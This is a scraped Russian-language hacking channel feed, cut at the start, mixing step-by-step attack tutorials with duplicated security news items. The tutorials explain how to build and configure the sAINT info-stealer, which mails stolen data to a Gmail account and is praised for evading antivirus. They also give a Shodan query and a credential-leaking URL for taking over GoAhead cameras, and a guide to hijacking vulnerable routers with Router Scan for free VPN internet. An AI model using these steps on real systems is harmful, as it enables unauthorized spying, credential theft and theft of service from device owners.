git clone https://github.com/tiagorlampert/sAINT.gitПереходим в созданную директорию и ставим права на скрипт установки
◽
cd sAINT/
◽chmod +x configure.shДалее нужно будет создать почту gmail, через которую sAINT автоматически будет присылать собранную информацию. Также, перейдя по ссылке, необходимо разрешить отправку с ненадежных приложений.
Использование
Запускаем билдер командой
◽
java -jar sAINT.jarДалее нужно настроить функционал будущего стиллера. В меню все конкретно написано: в первом пункте адрес созданной почты, во втором пароль от нее и т.д. В итоге останется только подтвердить информацию.
Готово, вирус собран в .jar файл, который вполне можно преобразовать в .exe. Интересной особенностью данного стиллера является его низкий показатель обнаружения антивирусами.
Детские смарт-часы Xplora 4 могут тайно следить за пользователями
«Умные» часы Xplora 4 от китайской компании Qihoo 360 Technology Co., предназначенные для детей, могут скрытно делать фотографии и записывать аудио при активации путем зашифрованного SMS-сообщения. Как сообщили эксперты из ИБ-компании Mnemonic, бэкдор представляет собой не уязвимость, а преднамеренно скрытый функционал.
«Бэкдор сам по себе не является уязвимостью. Это набор намеренно разработанных функций, которые включают удаленную съемку фотографий, отправку данных о местоположении и прослушивание телефонных разговоров через встроенный микрофон. Бэкдор активируется путем отправки SMS-команд на устройство», — сообщили специалисты.
Согласно Mnemonic, Xplora 4 содержит пакет под названием «Persistent Connection Service», который запускается во время процесса загрузки Android и перебирает установленные приложения для создания списка «намерений» (команд для вызова функций в других приложениях).
При соответствующем намерении Android входящее зашифрованное SMS-сообщение, полученное приложением Qihoo SMS, может быть направлено через диспетчер команд в службе постоянного подключения для запуска команды приложения, такой как удаленной снимок памяти.
Как утверждают представители компании, проблема связана с неиспользованным кодом из прототипа, который в настоящее время исправлен. Когда разрабатывались «умные» часы, родители предоставили отзывы и пожелания иметь возможность связаться со своими детьми в чрезвычайной ситуации и получать изображения местоположения в случае похищения. Xplora включила данные функции в прототипе, но решила не реализовывать их в коммерческой версии из соображений конфиденциальности.
#новость
«Умные» часы Xplora 4 от китайской компании Qihoo 360 Technology Co., предназначенные для детей, могут скрытно делать фотографии и записывать аудио при активации путем зашифрованного SMS-сообщения. Как сообщили эксперты из ИБ-компании Mnemonic, бэкдор представляет собой не уязвимость, а преднамеренно скрытый функционал.
«Бэкдор сам по себе не является уязвимостью. Это набор намеренно разработанных функций, которые включают удаленную съемку фотографий, отправку данных о местоположении и прослушивание телефонных разговоров через встроенный микрофон. Бэкдор активируется путем отправки SMS-команд на устройство», — сообщили специалисты.
Согласно Mnemonic, Xplora 4 содержит пакет под названием «Persistent Connection Service», который запускается во время процесса загрузки Android и перебирает установленные приложения для создания списка «намерений» (команд для вызова функций в других приложениях).
При соответствующем намерении Android входящее зашифрованное SMS-сообщение, полученное приложением Qihoo SMS, может быть направлено через диспетчер команд в службе постоянного подключения для запуска команды приложения, такой как удаленной снимок памяти.
Как утверждают представители компании, проблема связана с неиспользованным кодом из прототипа, который в настоящее время исправлен. Когда разрабатывались «умные» часы, родители предоставили отзывы и пожелания иметь возможность связаться со своими детьми в чрезвычайной ситуации и получать изображения местоположения в случае похищения. Xplora включила данные функции в прототипе, но решила не реализовывать их в коммерческой версии из соображений конфиденциальности.
#новость
Как можно взломать камеру без брутфорса?
Взлом камер видеонаблюдения методом перебора паролей известен почти всем. Но сложный пароль ещё не означает, что устройство невозможно взломать. Существует масса уязвимостей в прошивках камер, которые позволяют спокойно обходить авторизацию.
В качестве примера рассмотрим уязвимость в устройствах видеонаблюдения на базе сервера GoAhead. Она уже получила должную огласку и количество уязвимых камер с каждым годом падает. На данный момент таких устройств остается примерно 15 000 по всему миру. Напомним, что весь материал предоставляется исключительно в ознакомительных целях.
Поиск уязвимых камер
Для поиска уязвимых камер видеонаблюдения используют Shodan. Прописав запрос
По завершению поиска появится список уязвимых камер с подробной информацией об открытых портах, установленной системе, ip адресе и т.д.
Эксплуатация уязвимости
Для проведения тестовой атаки нам понадобится ip адрес камеры на базе GoAhead. Ключевой факт уязвимости GoAhead заключается в хранении данных для доступа к камере в незашифрованном файле конфигурации. Скачать его можно перейдя в браузере по адресу
#хакинг
Взлом камер видеонаблюдения методом перебора паролей известен почти всем. Но сложный пароль ещё не означает, что устройство невозможно взломать. Существует масса уязвимостей в прошивках камер, которые позволяют спокойно обходить авторизацию.
В качестве примера рассмотрим уязвимость в устройствах видеонаблюдения на базе сервера GoAhead. Она уже получила должную огласку и количество уязвимых камер с каждым годом падает. На данный момент таких устройств остается примерно 15 000 по всему миру. Напомним, что весь материал предоставляется исключительно в ознакомительных целях.
Поиск уязвимых камер
Для поиска уязвимых камер видеонаблюдения используют Shodan. Прописав запрос
realm="GoAhead", domain=":81"
Запрос можно модифицировать, добавив к примеру параметр country:"RU". Тогда найдутся все устройства с открытым портом 81 и системой GoAhead, которые расположены в России. Значение в domain также можно менять.По завершению поиска появится список уязвимых камер с подробной информацией об открытых портах, установленной системе, ip адресе и т.д.
Эксплуатация уязвимости
Для проведения тестовой атаки нам понадобится ip адрес камеры на базе GoAhead. Ключевой факт уязвимости GoAhead заключается в хранении данных для доступа к камере в незашифрованном файле конфигурации. Скачать его можно перейдя в браузере по адресу
http://<ip адрес камеры>:81/system.ini?loginuse&loginpas
Скачается файл с расширением .ini, открыв который в блокноте почти сходу можно наткнуться на имя пользователя и пароль. Остается перейти по адресуhttp://<ip адрес камеры>:81
Вписать полученные значение, выбрать интерфейс просмотра и готово. Помимо трансляции самой картинки в реальном времени в камерах GoAhead обычно есть возможность управлять ими используя стрелки.#хакинг
Армия США может использовать искусственный интеллект для точечных атак по позициям вероятного противника
В публикации американского издания C4ISRNET раскрывается алгоритм Project Convergence, позволяющий Армии США использовать спутники и искусственный интеллект (ИИ) для нанесения точного удара по позициям вероятного противника, в частности России и Китая.
Издание пишет, что низкоорбитальные спутники используются для получения снимков поля боя. Соответствующие сведения поступают на наземную станцию обработки данных Tactical Intelligence Targeting Access Node (TITAN), где проходят обработку системой ИИ Prometheus, выявляющей расположение объектов противника. Затем данные координаты передаются на командный пункт, где обрабатываются системой Tactical Assault Kit.
Система может определить, какое именно оружие необходимо для нанесения удара по вражескому объекту. «Оператор согласовывает рекомендацию, и данные о наведении отправляются в систему вооружения или солдату для нанесения удара», — пишет C4ISRNET.
Несмотря на то, что такая цепочка кажется достаточно сложной, на самом деле все операции выполняются в считанные секунды. Однако подобное описание вызывает скептическое отношение, так как на недавних тестовых запусках подобных систем американские военные отмечали расположение войск потенциального противника ручкой на бумаге.
#новость
В публикации американского издания C4ISRNET раскрывается алгоритм Project Convergence, позволяющий Армии США использовать спутники и искусственный интеллект (ИИ) для нанесения точного удара по позициям вероятного противника, в частности России и Китая.
Издание пишет, что низкоорбитальные спутники используются для получения снимков поля боя. Соответствующие сведения поступают на наземную станцию обработки данных Tactical Intelligence Targeting Access Node (TITAN), где проходят обработку системой ИИ Prometheus, выявляющей расположение объектов противника. Затем данные координаты передаются на командный пункт, где обрабатываются системой Tactical Assault Kit.
Система может определить, какое именно оружие необходимо для нанесения удара по вражескому объекту. «Оператор согласовывает рекомендацию, и данные о наведении отправляются в систему вооружения или солдату для нанесения удара», — пишет C4ISRNET.
Несмотря на то, что такая цепочка кажется достаточно сложной, на самом деле все операции выполняются в считанные секунды. Однако подобное описание вызывает скептическое отношение, так как на недавних тестовых запусках подобных систем американские военные отмечали расположение войск потенциального противника ручкой на бумаге.
#новость
Router Scan. Взлом роутера и получение бесплатного интернета
Программа для поиска уязвимых роутеров Router Scan обрела популярность ещё пару лет назад. Со временем количество уязвимых роутеров стало только больше, что поставило под угрозу огромное количество пользователей. Ведь при получении доступа к маршрутизатору злоумышленник может перехватывать данные, изменять настройки DNS или поднять VPN, тем самым обеспечив себе доступ в Интернет за чужой счет. О последнем варианте и как от него уберечься речь сегодня и пойдет.
Установка и поиск роутеров
Скачиваем Router Scan с официального сайта.
Теперь нам понадобятся диапазоны ip адресов. Взять их можно с этого сайта, введя название любого города.
Полученные диапазоны нужно вписать в соответствующее поле в верхней панели Router Scan. В "Scan ports" можно оставить значения по умолчанию. В "Scanning modules" нужно выбрать только три первых пункта.
После нажатия "Start scan" во вкладке "Good Results" начнут появляться потенциально уязвимые устройства с полученными авторизационными данными. Если при подобной проверке ip диапазона вашего города вы нашли в "Good Results" свой роутер, то уже на этом этапе лучше обратиться в техподдержку или вручную обновить прошивку роутера, скачав её с официального сайта.
Подключению к роутеру и поднятие VPN
Подключение к уязвимому роутеру реализуется за счет браузера. В поисковую строку нужно вписать запрос в виде
Далее идет процесс поднятия VPN. У каждого роутера разный интерфейс, а некоторые данную функцию вообще не поддерживают. Если объяснять поверхностно, то для начала нужно будет включить службу PPTP вписав придуманные авторизационные данные и выбрав уникальный локальный ip. После чего настроить NAT пробросив порты 1723 и 1729.
Подключаться к созданному VPN можно через встроенную службу Windows, которая находится по пути
#хакинг
Программа для поиска уязвимых роутеров Router Scan обрела популярность ещё пару лет назад. Со временем количество уязвимых роутеров стало только больше, что поставило под угрозу огромное количество пользователей. Ведь при получении доступа к маршрутизатору злоумышленник может перехватывать данные, изменять настройки DNS или поднять VPN, тем самым обеспечив себе доступ в Интернет за чужой счет. О последнем варианте и как от него уберечься речь сегодня и пойдет.
Установка и поиск роутеров
Скачиваем Router Scan с официального сайта.
Теперь нам понадобятся диапазоны ip адресов. Взять их можно с этого сайта, введя название любого города.
Полученные диапазоны нужно вписать в соответствующее поле в верхней панели Router Scan. В "Scan ports" можно оставить значения по умолчанию. В "Scanning modules" нужно выбрать только три первых пункта.
После нажатия "Start scan" во вкладке "Good Results" начнут появляться потенциально уязвимые устройства с полученными авторизационными данными. Если при подобной проверке ip диапазона вашего города вы нашли в "Good Results" свой роутер, то уже на этом этапе лучше обратиться в техподдержку или вручную обновить прошивку роутера, скачав её с официального сайта.
Подключению к роутеру и поднятие VPN
Подключение к уязвимому роутеру реализуется за счет браузера. В поисковую строку нужно вписать запрос в виде
<ip роутера>:<порт>
Откроется форма входа, в которую нужно вписать данные из колонки "Authorization" в Router Scan.Далее идет процесс поднятия VPN. У каждого роутера разный интерфейс, а некоторые данную функцию вообще не поддерживают. Если объяснять поверхностно, то для начала нужно будет включить службу PPTP вписав придуманные авторизационные данные и выбрав уникальный локальный ip. После чего настроить NAT пробросив порты 1723 и 1729.
Подключаться к созданному VPN можно через встроенную службу Windows, которая находится по пути
"Пуск" -> "Панель управления" -> "Сеть и интернет" -> "Центр управления сетями и общим доступом" -> "Настройка нового подключения или сети" -> "Подключение к рабочему месту"
Выбрав "Использовать моё подключение к интернету(VPN)" нужно вписать ip роутера и придуманные ранее авторизационные данные. Готово, теперь весь трафик атакующего ПК будет идти за счет владельца взломанного роутера.#хакинг
В сентябре число продаваемых в дарквебе взломанных сетей утроилось
В сентябре 2020 года число рекламных объявлений в дарквебе, предлагающих доступ к взломанным ИТ-сетям, выросло в три раза в сравнении с августом. Такими данными поделились исследователи из KELA.
В отчёте специалистов отмечается, что в общей сумме за доступ ко всем сетям преступники требуют около $505 тысяч. Соответствующие предложения размещаются на популярных хакерских форумах.
Около четверти от общего числа скомпрометированных данных злоумышленники продали другим киберпреступникам, планирующим атаковать пострадавшие от утечки компании.
Эксперты убеждены, что свою роль в таком скачке продаваемого доступа к взломанным сетям сыграли уязвимости в продуктах крупных компаний: серверах Pulse Secure и Fortinet VPN, шлюзах Citrix.
Злоумышленники оперативно начали эксплуатировать эти бреши, что привело к массовой компрометации сетей. Помимо этого, на площадках дарквеба также продаются взломанные конечные точки RDP и VNC, большая часть которых попала в руки преступников благодаря брутфорс-атакам и IoT-ботнетам.
По данным команды KELA, средняя цена за взломанную сеть составляет $4960, но разброс в целом громадный — от $25 до $102 000.
#новость
В сентябре 2020 года число рекламных объявлений в дарквебе, предлагающих доступ к взломанным ИТ-сетям, выросло в три раза в сравнении с августом. Такими данными поделились исследователи из KELA.
В отчёте специалистов отмечается, что в общей сумме за доступ ко всем сетям преступники требуют около $505 тысяч. Соответствующие предложения размещаются на популярных хакерских форумах.
Около четверти от общего числа скомпрометированных данных злоумышленники продали другим киберпреступникам, планирующим атаковать пострадавшие от утечки компании.
Эксперты убеждены, что свою роль в таком скачке продаваемого доступа к взломанным сетям сыграли уязвимости в продуктах крупных компаний: серверах Pulse Secure и Fortinet VPN, шлюзах Citrix.
Злоумышленники оперативно начали эксплуатировать эти бреши, что привело к массовой компрометации сетей. Помимо этого, на площадках дарквеба также продаются взломанные конечные точки RDP и VNC, большая часть которых попала в руки преступников благодаря брутфорс-атакам и IoT-ботнетам.
По данным команды KELA, средняя цена за взломанную сеть составляет $4960, но разброс в целом громадный — от $25 до $102 000.
#новость
34% организаций контролируют геолокацию удалённых сотрудников
«Первая волна» коронавируса заставила работодателей задуматься об организации защищенных сервисов для удаленной работы. Согласно недавнему опросу, организации прежде всего позаботились о безопасности каналов дистанционного взаимодействия: 90% компаний полностью или частично используют VPN для удаленной работы.
Много внимания уделяется контролю доступа к конфиденциальной информации: 52% организаций регулярно проверяют права и перечень ресурсов, доступных для удаленных пользователей. Более 40% работодателей осуществляют мониторинг и записывают действия сотрудников и подрядчиков, удаленно подключающихся к корпоративной инфраструктуре.
Компании следят не только за тем, что сотрудники делают в корпоративной сети, но и за их местоположением и количеством отработанного времени: 34% опрошенных контролируют геолокацию и ведут учет длительности удаленных сессий и интервалов работы.
Организации проверяют устройства, с которых сотрудники подключаются к инфраструктуре. 38% компаний оценивает состояние устройств пользователей в момент их подключения по VPN и отслеживает наличие обновлений безопасности ОС и антивируса, не допуская зараженный компьютер в сеть.
#новость
«Первая волна» коронавируса заставила работодателей задуматься об организации защищенных сервисов для удаленной работы. Согласно недавнему опросу, организации прежде всего позаботились о безопасности каналов дистанционного взаимодействия: 90% компаний полностью или частично используют VPN для удаленной работы.
Много внимания уделяется контролю доступа к конфиденциальной информации: 52% организаций регулярно проверяют права и перечень ресурсов, доступных для удаленных пользователей. Более 40% работодателей осуществляют мониторинг и записывают действия сотрудников и подрядчиков, удаленно подключающихся к корпоративной инфраструктуре.
Компании следят не только за тем, что сотрудники делают в корпоративной сети, но и за их местоположением и количеством отработанного времени: 34% опрошенных контролируют геолокацию и ведут учет длительности удаленных сессий и интервалов работы.
Организации проверяют устройства, с которых сотрудники подключаются к инфраструктуре. 38% компаний оценивает состояние устройств пользователей в момент их подключения по VPN и отслеживает наличие обновлений безопасности ОС и антивируса, не допуская зараженный компьютер в сеть.
#новость